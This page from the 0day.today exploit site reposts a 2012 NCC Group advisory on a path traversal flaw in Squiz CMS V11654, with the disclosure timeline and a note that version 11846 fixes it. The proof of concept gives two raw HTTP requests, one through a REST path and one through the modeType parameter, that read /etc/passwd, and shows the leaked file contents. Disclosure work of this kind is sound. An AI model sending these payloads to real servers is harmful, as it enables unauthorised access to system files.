0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Squiz CMS 11654 File Path Traversal Vulnerability
[======= Summary ======= Name: Squiz CMS - File Path Traversal Release Date: 30 November 2012 Reference: NGS00330 Discoverer: Robert Ray <robert.ray@ngssecure.com> Vendor: Squiz Vendor Reference: 11846 Systems Affected: Squiz CMS V11654 Risk: High Status: Published ======== TimeLine ======== Discovered: 29 June 2012 Released: 29 June 2012 Approved: 2 July 2012 Reported: 9 July 2012 Fixed: 9 August 2012 Published: 30 November 2012 =========== Description =========== Squiz CMS V11654 - File Path Traversal I. VULNERABILITY ------------------------- The open source platform Squiz CMS version 11654 is vulnerable to file path traversal attacks allowing authenticated attackers to gain access to arbitrary system files. II. BACKGROUND ------------------------- Squiz CMS is an open source content management system used by a number of sectors around the globe including Charities, Associations & Not For Profit, Corporate, Finance & Professional Services, Cultural Institutions, Education, Government & Public Sector, Health & Social Services, Media & Publishing, Travel & Tourism etc. http://www.squiz.co.uk/showcase/ III. DESCRIPTION ------------------------- Directory traversal has been found and confirmed within the software as an authenticated user. In some cases it is possible for users to self register within the software if configured for this use case. ================= Technical Details ================= IV. PROOF OF CONCEPT ------------------------- The vulnerabilities detected include method by means of a REST parameter: GET /__web/Systems/UnregisteredDomainWidget/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: cmsdemo.squiz.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 Accept: */* Accept-Language: en,en-us;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4 HTTP/1.1 200 OK Content-type: application/octet-stream Expires: Sun, 1 Jul 2012 00:00:00 Last-Modified: Sat, 30 Jun 2012 00:00:00 Content-Length: 1236 Date: Fri, 29 Jun 2012 21:46:36 GMT Server: lighttpd/1.4.28 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown And also by means of the "modeType" GET parameter. GET /_edit?modeType=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 Host: cmsdemo.squiz.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 Accept: */* Accept-Language: en,en-us;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4 HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html; charset=UTF-8 Date: Fri, 29 Jun 2012 19:56:11 GMT Server: lighttpd/1.4.28 Content-Length: 1236 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown =============== Fix Information =============== The vendor has released an update to address this issue. Fixed in version 11846. http://cms.squizsuite.net/download NCC Group Research http://www.nccgroup.com/research For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br> This email message has been delivered safely and archived online by Mimecast. </a> # 0day.today [2024-07-02] #